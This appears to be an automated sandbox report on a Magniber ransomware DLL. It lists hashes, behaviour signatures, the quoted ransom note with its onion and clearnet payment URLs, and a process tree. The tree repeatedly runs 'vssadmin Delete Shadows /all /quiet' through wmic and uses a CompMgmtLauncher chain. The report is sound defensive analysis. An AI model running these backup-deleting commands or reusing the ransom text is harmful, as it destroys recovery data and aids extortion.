Overview

overview

10

Static

static

3

4f66a5b1bb...18.dll

windows7-x64

10

4f66a5b1bb...18.dll

windows10-2004-x64

10

Analysis

  • max time kernel
    120s
  • max time network
    144s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    16-07-2024 17:46

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    4f66a5b1bb80abbe07697409267d28f5_JaffaCakes118.dll

  • Size

    38KB

  • MD5

    4f66a5b1bb80abbe07697409267d28f5

  • SHA1

    c9e4bf287498a31f75660c9935b80c6eb4082fc8

  • SHA256

    10e1b47731018be0b25fb40a32f85ac586f5cbe3fb57450818ddec6bafa7d618

  • SHA512

    5eedcca7ee841997de04204a2becf00301d54e9970d4e28a4ef4aa0156f00af85eeb0a31e974238644d24c33c042bfa040451a9d0dcb97750c632e9c9cd306b8

  • SSDEEP

    768:WgXItQkVssHyWby4FHCStRCGm45ah7soezD3v7h+SHU0GntxVbFe6Eg:WgXP+vniOgGmyaa35Hsxat

Score
10/10
magniberdefense_evasionexecutionimpactransomware

Malware Config

Extracted

Path

C:\Users\Admin\Pictures\readme.txt婍

Ransom Note
ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://b4b04a686e10b470eaitmptmni.pmaev7tzx2wapvo7wgqoaljngomjzzs3d4t53jctdq5cs5imrzjhcgid.onion/aitmptmni Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://b4b04a686e10b470eaitmptmni.uscatch.club/aitmptmni http://b4b04a686e10b470eaitmptmni.roomsum.xyz/aitmptmni http://b4b04a686e10b470eaitmptmni.flyput.site/aitmptmni http://b4b04a686e10b470eaitmptmni.knewago.quest/aitmptmni Note! These are temporary addresses! They will be available for a limited amount of time! ?�
URLs

http://b4b04a686e10b470eaitmptmni.pmaev7tzx2wapvo7wgqoaljngomjzzs3d4t53jctdq5cs5imrzjhcgid.onion/aitmptmni

http://b4b04a686e10b470eaitmptmni.uscatch.club/aitmptmni

http://b4b04a686e10b470eaitmptmni.roomsum.xyz/aitmptmni

http://b4b04a686e10b470eaitmptmni.flyput.site/aitmptmni

http://b4b04a686e10b470eaitmptmni.knewago.quest/aitmptmni

Signatures

  • Detect magniber ransomware 1 IoCs
  • Magniber Ransomware

    Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.

    ransomwaremagniber
  • Process spawned unexpected child process 15 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomwaredefense_evasionimpactexecution
  • Renames multiple (93) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Suspicious use of SetThreadContext 4 IoCs
  • Interacts with shadow copies 3 TTPs 10 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
    adwarespyware
  • Modifies registry class 13 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of UnmapMainImage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Windows\system32\taskhost.exe
    "taskhost.exe"
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1108
    • C:\Windows\system32\wbem\wmic.exe
      C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
      2⤵
        PID:1492
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2060
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          3⤵
            PID:1608
      • C:\Windows\system32\Dwm.exe
        "C:\Windows\system32\Dwm.exe"
        1⤵
        • Modifies registry class
        PID:1164
        • C:\Windows\system32\wbem\wmic.exe
          C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
          2⤵
            PID:2836
          • C:\Windows\system32\cmd.exe
            cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
            2⤵
              PID:1812
              • C:\Windows\system32\wbem\WMIC.exe
                C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
                3⤵
                  PID:2368
            • C:\Windows\Explorer.EXE
              C:\Windows\Explorer.EXE
              1⤵
              • Modifies registry class
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of UnmapMainImage
              • Suspicious use of WriteProcessMemory
              PID:1220
              • C:\Windows\system32\rundll32.exe
                rundll32.exe C:\Users\Admin\AppData\Local\Temp\4f66a5b1bb80abbe07697409267d28f5_JaffaCakes118.dll,#1
                2⤵
                • Suspicious use of SetThreadContext
                • Modifies registry class
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of WriteProcessMemory
                PID:2368
                • C:\Windows\system32\notepad.exe
                  notepad.exe C:\Users\Public\readme.txt?
                  3⤵
                  • Opens file in notepad (likely ransom note)
                  PID:804
                • C:\Windows\system32\cmd.exe
                  cmd /c "start http://b4b04a686e10b470eaitmptmni.uscatch.club/aitmptmni^&2^&44534954^&93^&379^&12"?
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:888
                  • C:\Program Files\Internet Explorer\iexplore.exe
                    "C:\Program Files\Internet Explorer\iexplore.exe" http://b4b04a686e10b470eaitmptmni.uscatch.club/aitmptmni&2&44534954&93&379&12?
                    4⤵
                    • Modifies Internet Explorer settings
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SetWindowsHookEx
                    • Suspicious use of WriteProcessMemory
                    PID:2856
                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2856 CREDAT:275457 /prefetch:2
                      5⤵
                      • Modifies Internet Explorer settings
                      • Suspicious use of SetWindowsHookEx
                      PID:2616
                • C:\Windows\system32\wbem\wmic.exe
                  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
                  3⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1752
                • C:\Windows\system32\cmd.exe
                  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2680
                  • C:\Windows\system32\wbem\WMIC.exe
                    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
                    4⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1596
              • C:\Windows\system32\wbem\wmic.exe
                C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
                2⤵
                  PID:232
                • C:\Windows\system32\cmd.exe
                  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
                  2⤵
                    PID:3056
                    • C:\Windows\system32\wbem\WMIC.exe
                      C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
                      3⤵
                        PID:2492
                  • C:\Windows\system32\DllHost.exe
                    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                    1⤵
                    • Modifies registry class
                    • Suspicious use of WriteProcessMemory
                    PID:1396
                    • C:\Windows\system32\wbem\wmic.exe
                      C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
                      2⤵
                        PID:3000
                      • C:\Windows\system32\cmd.exe
                        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:3012
                        • C:\Windows\system32\wbem\WMIC.exe
                          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
                          3⤵
                            PID:1380
                      • C:\Windows\system32\vssadmin.exe
                        vssadmin.exe Delete Shadows /all /quiet
                        1⤵
                        • Process spawned unexpected child process
                        • Interacts with shadow copies
                        PID:2664
                      • C:\Windows\system32\cmd.exe
                        cmd /c CompMgmtLauncher.exe
                        1⤵
                        • Process spawned unexpected child process
                        • Suspicious use of WriteProcessMemory
                        PID:2720
                        • C:\Windows\system32\CompMgmtLauncher.exe
                          CompMgmtLauncher.exe
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:684
                          • C:\Windows\system32\wbem\wmic.exe
                            "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                            3⤵
                              PID:1628
                        • C:\Windows\system32\vssvc.exe
                          C:\Windows\system32\vssvc.exe
                          1⤵
                            PID:2940
                          • C:\Windows\system32\vssadmin.exe
                            vssadmin.exe Delete Shadows /all /quiet
                            1⤵
                            • Process spawned unexpected child process
                            • Interacts with shadow copies
                            PID:2896
                          • C:\Windows\system32\vssadmin.exe
                            vssadmin.exe Delete Shadows /all /quiet
                            1⤵
                            • Process spawned unexpected child process
                            • Interacts with shadow copies
                            PID:1544
                          • C:\Windows\system32\cmd.exe
                            cmd /c CompMgmtLauncher.exe
                            1⤵
                            • Process spawned unexpected child process
                            • Suspicious use of WriteProcessMemory
                            PID:2496
                            • C:\Windows\system32\CompMgmtLauncher.exe
                              CompMgmtLauncher.exe
                              2⤵
                              • Suspicious use of WriteProcessMemory
                              PID:440
                              • C:\Windows\system32\wbem\wmic.exe
                                "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                                3⤵
                                  PID:1572
                            • C:\Windows\system32\vssadmin.exe
                              vssadmin.exe Delete Shadows /all /quiet
                              1⤵
                              • Process spawned unexpected child process
                              • Interacts with shadow copies
                              PID:1656
                            • C:\Windows\system32\cmd.exe
                              cmd /c CompMgmtLauncher.exe
                              1⤵
                              • Process spawned unexpected child process
                              • Suspicious use of WriteProcessMemory
                              PID:2996
                              • C:\Windows\system32\CompMgmtLauncher.exe
                                CompMgmtLauncher.exe
                                2⤵
                                • Suspicious use of WriteProcessMemory
                                PID:1736
                                • C:\Windows\system32\wbem\wmic.exe
                                  "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                                  3⤵
                                    PID:2740
                              • C:\Windows\system32\vssadmin.exe
                                vssadmin.exe Delete Shadows /all /quiet
                                1⤵
                                • Process spawned unexpected child process
                                • Interacts with shadow copies
                                PID:864
                              • C:\Windows\system32\vssadmin.exe
                                vssadmin.exe Delete Shadows /all /quiet
                                1⤵
                                • Process spawned unexpected child process
                                • Interacts with shadow copies
                                PID:1812
                              • C:\Windows\system32\cmd.exe
                                cmd /c CompMgmtLauncher.exe
                                1⤵
                                • Process spawned unexpected child process
                                PID:1872
                                • C:\Windows\system32\CompMgmtLauncher.exe
                                  CompMgmtLauncher.exe
                                  2⤵
                                    PID:1452
                                    • C:\Windows\system32\wbem\wmic.exe
                                      "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                                      3⤵
                                        PID:2544
                                  • C:\Windows\system32\vssadmin.exe
                                    vssadmin.exe Delete Shadows /all /quiet
                                    1⤵
                                    • Process spawned unexpected child process
                                    • Interacts with shadow copies
                                    PID:2392
                                  • C:\Windows\system32\vssadmin.exe
                                    vssadmin.exe Delete Shadows /all /quiet
                                    1⤵
                                    • Process spawned unexpected child process
                                    • Interacts with shadow copies
                                    PID:864
                                  • C:\Windows\system32\cmd.exe
                                    cmd /c CompMgmtLauncher.exe
                                    1⤵
                                    • Process spawned unexpected child process
                                    PID:1564
                                    • C:\Windows\system32\CompMgmtLauncher.exe
                                      CompMgmtLauncher.exe
                                      2⤵
                                        PID:3048
                                        • C:\Windows\system32\wbem\wmic.exe
                                          "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                                          3⤵
                                            PID:2588
                                      • C:\Windows\system32\vssadmin.exe
                                        vssadmin.exe Delete Shadows /all /quiet
                                        1⤵
                                        • Process spawned unexpected child process
                                        • Interacts with shadow copies
                                        PID:1596
                                      • C:\Windows\system32\vssadmin.exe
                                        vssadmin.exe Delete Shadows /all /quiet
                                        1⤵
                                        • Process spawned unexpected child process
                                        • Interacts with shadow copies
                                        PID:1724

                                      Network

                                      MITRE ATT&CK Enterprise v15

                                      Replay Monitor

                                      Loading Replay Monitor...

                                      Downloads

                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                        Filesize

                                        342B

                                        MD5

                                        5145a8d88488547f7aac370ce53e9f7f

                                        SHA1

                                        a19a92c010fd405713893915abd8bff02679675a

                                        SHA256

                                        b19616cb6d0ff28ea02f6646de6751a9ada3e2fedb9d06e453810ca7a1818f56

                                        SHA512

                                        81bec948962cf14e07c5e73b007982eba6000843e0c604add9bde21e5facdf65bf65567d805c2e0d1a100bc4ae0a14912362064cfeacafdb2a8afea07bd2fdd5

                                        Download Submit

                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                        Filesize

                                        342B

                                        MD5

                                        c870eeb1fe11796261173b7d7e14e8d8

                                        SHA1

                                        23a6c7d66e9dde439a5cc4c2748743ec47d7b39b

                                        SHA256

                                        0ff9743dee4c058d7ef755e7fb888e3e3594e33a32de09ba634c05b95f62a546

                                        SHA512

                                        926d2d909aa877fbb30955445cb796b75a1de5c4d56a511002bfc2dc79c167ae910d0e06fe7fcad96265dcd91082ecd0032f3ae085e9c2bf4033a346213ab2dc

                                        Download Submit

                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                        Filesize

                                        342B

                                        MD5

                                        6d8552f08d8c4fa36dfb9b49712f899c

                                        SHA1

                                        7e1c7af37bbfdf37e45ea5cd2ab50daaf8087fd6

                                        SHA256

                                        0dedb32f3dd40db4049118ed30cbacd07842cda1a5a7213a8f5f292f658c92df

                                        SHA512

                                        fc6d02de632b8c4c6a65e77726468f8107bd3376db6ab8ac93dd527923ac399b8e67fb59e0ffd0bce7249db4060e18575a81c8e09133612217ee0eb63ceb2b3f

                                        Download Submit

                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                        Filesize

                                        342B

                                        MD5

                                        15469fe461dd50e10013baee3ac81d75

                                        SHA1

                                        57ffd72d0ae074dced8fb68ffeb303f0feaf7efa

                                        SHA256

                                        becbb7ab57be1143eea500b025cba1de1c96abe9f41cba070523fe942bd8ee6d

                                        SHA512

                                        1e292bc179f1b081da9ae032ab130301e7f5a7b58e8b24985b8ffdb102035ce60b690abf76abe191c3be7a66e9c7f3a4d43b16bd3f2c15a98a07cca0204bdffe

                                        Download Submit

                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                        Filesize

                                        342B

                                        MD5

                                        17921cfe49ed846ef08358d16ba89cc3

                                        SHA1

                                        a6e609a7207b9fbfae6153e23d59eca3ef6e8b40

                                        SHA256

                                        5a35632faabdc2c735963b2fe3c2c33d51d9647048b5c67e24d5da2141a6c8e9

                                        SHA512

                                        31547e222860e6fe602ba93734d8d40d756980e5705b2ab8f4fb31b5c81a3e34a8db485179df7a2f4dba0932fd744da985a354b485a655500ffb4ab3c1f632fc

                                        Download Submit

                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                        Filesize

                                        342B

                                        MD5

                                        d41479a4722d3f77be61934bd217a419

                                        SHA1

                                        b3332fb4d5490b38cdc2449a5281a527adf85436

                                        SHA256

                                        2d106f66685acfe3096c2cc288754279f6b711fb27a0039832deb9c61b609e84

                                        SHA512

                                        95fc44c13157e9e918f63fdefd24ce9dbb9fbe8339a7e991bfffd62a9028980c053a5fa938ffabb538ed73ffb41d229aa9cb7e87a3ff15c5162e54b53fc005d8

                                        Download Submit

                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                        Filesize

                                        342B

                                        MD5

                                        ce7d84476ee849f85bca3c904d27053b

                                        SHA1

                                        27271c0773206db87bad3628e8d0e98711d73793

                                        SHA256

                                        1c13ee7b5ca7ddf91b46f01f152d2f91dfe9314141484f1cc9016455dc4ea0e9

                                        SHA512

                                        64466bc6d5784ba48fba3521647f51bd620758d92fa1b56321dbf2bfcb00663e29468d66c3910ada04113ba904b5f05254d7b87bc3b0ab8815359b58fea5f3da

                                        Download Submit

                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                        Filesize

                                        342B

                                        MD5

                                        49ed1a1f133c43ac3ceca5c6126fdb84

                                        SHA1

                                        fb78e69d19f5d998d1fdc88566d605d894ef5d06

                                        SHA256

                                        9433038593a3b3e2b350f1de26f32ed862144b3627038eae4ffddc75a14ba26f

                                        SHA512

                                        a58ada440570f190baecd4d18db4e15e74dfb1b5b61cdfa89544041fb735cb0e74e784496c8c034e50a6f9f8f307b0f88a67ff4a1c96ec0a14f8dec3dc3d3e96

                                        Download Submit

                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                        Filesize

                                        342B

                                        MD5

                                        e2314bb239fa2388a4780fac7a9351df

                                        SHA1

                                        c3426229b01c3f0d1dfe3061512f6f247ec5f28c

                                        SHA256

                                        83b22b5b039d4797a4ebdb11bc85d2426c9671dc124a4a8a0cd87f2e89970a0b

                                        SHA512

                                        4feaddb7716ba005173944e6da76626d15f004c008afbefa37f4d3548fe560bbe5f600ae2af6964e86b21f538e370c1a4135d94ccd30932a6c7dda6b12871d51

                                        Download Submit

                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                        Filesize

                                        342B

                                        MD5

                                        64464fe81c4b3cbf5c9011b82d8b3791

                                        SHA1

                                        e7c43f873fdae25774c97e323c19cc2a3f343f37

                                        SHA256

                                        d6e17d117620718ff84014ba7d15c0fe8ef9775a2ad951eea38ef9d56f932634

                                        SHA512

                                        6a19c20c3447774515b9e6caab16b8eb48db4d5560cb2909b9fddca3367db59d5a6bbe86989041feb97eb37891d06cd7ba9daebd4c6c92e31b52df5e90f4b7f2

                                        Download Submit

                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                        Filesize

                                        342B

                                        MD5

                                        da71c178480a5966ecf9f616bc913662

                                        SHA1

                                        d9b0ac16f3d5946961500f20e48ecc4aaf5729e1

                                        SHA256

                                        40bce48447a77c573c5da4d258b50ff99c936eb99645cb614ab8b8648b467b74

                                        SHA512

                                        6978b4bfe0a774ae7c0f80c4dd1b8576d247a36eb66a72d201272ea63884e28d51c9fca35e2f6dba5a17b20319cc84a1ae53b890f5e8459db830b73786bd40aa

                                        Download Submit

                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                        Filesize

                                        342B

                                        MD5

                                        9c98eff54cd4e979f4a0faf2a418fd25

                                        SHA1

                                        233a23e364dca7b7a73f5daca5a7863b090dbc78

                                        SHA256

                                        d58993d069af1aba339aa70117f7ddb46fe12aa39d53d3de2786747a00bce4dc

                                        SHA512

                                        30e4a50fa7da252aaa79079e3bd2b9431f84d972913610a05fdf70af171297bc9e0e406cc6538046c4034c9d056dbb30f15c17421d20291165a13113a308b684

                                        Download Submit

                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                        Filesize

                                        342B

                                        MD5

                                        602cfd262ae7080bbfe34fa131ddc5c5

                                        SHA1

                                        7d44f99595bcd78ae69f2d64567eca8ed462a5b4

                                        SHA256

                                        ceefea4291930dabdf441d0b8a4aa91468f8e69a0db8b23eb5c46a6b0baf99d1

                                        SHA512

                                        a34d9afe59a876bc0c560fae98fddf1bb3a37fd237502df119373362349251c033a57d604917d3626d902b6a6f4eb1c317c258e56e599baa7a89df00c5faff2e

                                        Download Submit

                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                        Filesize

                                        342B

                                        MD5

                                        67d164e1d6ec4ae148880eb39f358d60

                                        SHA1

                                        eae038d57bd27f972eed26d7bd43a3241f8e69d4

                                        SHA256

                                        04f2d72a32e0bc0e8042e9a3cf2a917318fea3c7267a5941a4a1198648ff24e2

                                        SHA512

                                        2675e0f9415a685e79ec410b796a5288d89b6f44d8f6a0bfcab5fc348af49bae999542c48b4af2af109fbe3e84ce368201611b4f92db23491c3d039cb87a76ec

                                        Download Submit

                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                        Filesize

                                        342B

                                        MD5

                                        07141a8117e8c0b802e3880c8803b516

                                        SHA1

                                        9124202646c76b108e37078bae94fedb5ad994ed

                                        SHA256

                                        04738399f310c2235f95a8d2146d5263ad3653bf9db1e7605f59aef845947e76

                                        SHA512

                                        1461f89cbbb419bef6a3b0b9b263a8dd2a53276592e426e821f7ffb34055b2232a70b743762e102b1c938dfc17131636c7f82e65dfe9b324ce9bbb5a903ec73b

                                        Download Submit

                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                        Filesize

                                        342B

                                        MD5

                                        b737c4be1528116114bb88980354b960

                                        SHA1

                                        950b9ec2f5261e8b949e7df57a13b388a9f3e8ef

                                        SHA256

                                        815e4403e9f44cadbe224c1d57827f9352cedf5036d25463374c72212f6b49d3

                                        SHA512

                                        3e490ab6076fefa8cb10fa370a34b5aeceb54a866beb7035bc87fee96276401980ab007f137a47c528f5a249e2851edf554d68e489c9e0fbf62dd8e885b1e5f9

                                        Download Submit

                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                        Filesize

                                        342B

                                        MD5

                                        10da8c5b46a98bffb0176886fa0112e2

                                        SHA1

                                        5f02554d86d093b3af1b7ff9f472247a1da59ae4

                                        SHA256

                                        1b002f2f2d2e89095bfbb2bb38fcf8f2ec58ec2b7c0aaef46bbde9843218d862

                                        SHA512

                                        3ee501c9cf32a1c60cabcbe1a146eb050105e4107e578aae4ccecf6209c78277e66811b24879e4fa1d4e159bddc42bc17b0017130e3abc1c9f1b06f1fa8522a5

                                        Download Submit

                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                        Filesize

                                        342B

                                        MD5

                                        f383d847c3ee02758a21c36565571eb9

                                        SHA1

                                        ca3f533540ed476af705fa213f968f1da3615e00

                                        SHA256

                                        a9c1228b07c8dacf41a665edb5f36148807409b42df15597445bab9167d0164f

                                        SHA512

                                        2a8c2ba54491f75e5bbc3c2d664ca8601f3e513553ff17727092abbd996fd589f5bcfc5e5c800b9f5920e134944e81a3a30e1402c8d43d496348603451a814a7

                                        Download Submit

                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                        Filesize

                                        342B

                                        MD5

                                        62e7547d7d32e08ce1046fe244379828

                                        SHA1

                                        e3ef15a7196f3072ee93f5f285e4c569e13fc791

                                        SHA256

                                        2e77dc9b80e027a1115639a623512fac584618cb1713c33176920f07b4a6cbe7

                                        SHA512

                                        43b326c7c86e19457abc8b1d80b0690f60c02978951538283a3a4ad6e139363f852ecc1bf375884cd92c17c2ac04591eef5c6f0efa46d07f729fae6273cb3abf

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Temp\Cab7B1.tmp
                                        Filesize

                                        70KB

                                        MD5

                                        49aebf8cbd62d92ac215b2923fb1b9f5

                                        SHA1

                                        1723be06719828dda65ad804298d0431f6aff976

                                        SHA256

                                        b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

                                        SHA512

                                        bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Temp\Tar812.tmp
                                        Filesize

                                        181KB

                                        MD5

                                        4ea6026cf93ec6338144661bf1202cd1

                                        SHA1

                                        a1dec9044f750ad887935a01430bf49322fbdcb7

                                        SHA256

                                        8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

                                        SHA512

                                        6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

                                        Download Submit

                                      • C:\Users\Admin\Pictures\readme.txt婍
                                        Filesize

                                        1KB

                                        MD5

                                        ec5ddbc8d03aff3c4f18bc071c2e0e15

                                        SHA1

                                        43c7dc516ffee868562155ad9506832738a4bc52

                                        SHA256

                                        5f6148d39c0ff47515fd9af97ec69b58a77ca866d6578c1eb4160d97eaba16f9

                                        SHA512

                                        6fb8cac0dc15b689afd467685c81c1e7c47543e7d46ac0d387718e2a0e3fc8d61a580bec7e9c9adf180df07cbb42386be8df383fb15f17d5811d948b98ee681c

                                        Download Submit

                                      • \??\PIPE\srvsvc
                                        MD5

                                        d41d8cd98f00b204e9800998ecf8427e

                                        SHA1

                                        da39a3ee5e6b4b0d3255bfef95601890afd80709

                                        SHA256

                                        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                        SHA512

                                        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                        Download Submit

                                      • memory/1108-12-0x0000000000310000-0x0000000000315000-memory.dmp

                                        Filesize

                                        20KB

                                        Download

                                      • memory/2368-2-0x00000000006D0000-0x00000000006D1000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/2368-8-0x0000000001DA0000-0x0000000001DA1000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/2368-9-0x0000000001DB0000-0x0000000001DB1000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/2368-0-0x0000000001F90000-0x00000000022CA000-memory.dmp

                                        Filesize

                                        3.2MB

                                        Download

                                      • memory/2368-7-0x0000000001D60000-0x0000000001D61000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/2368-6-0x0000000001D50000-0x0000000001D51000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/2368-5-0x0000000001D40000-0x0000000001D41000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/2368-4-0x00000000006F0000-0x00000000006F1000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/2368-3-0x00000000006E0000-0x00000000006E1000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/2368-10-0x0000000001DC0000-0x0000000001DC1000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/2368-1-0x00000000006C0000-0x00000000006C1000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/2368-11-0x0000000001DD0000-0x0000000001DD1000-memory.dmp

                                        Filesize

                                        4KB

                                        Download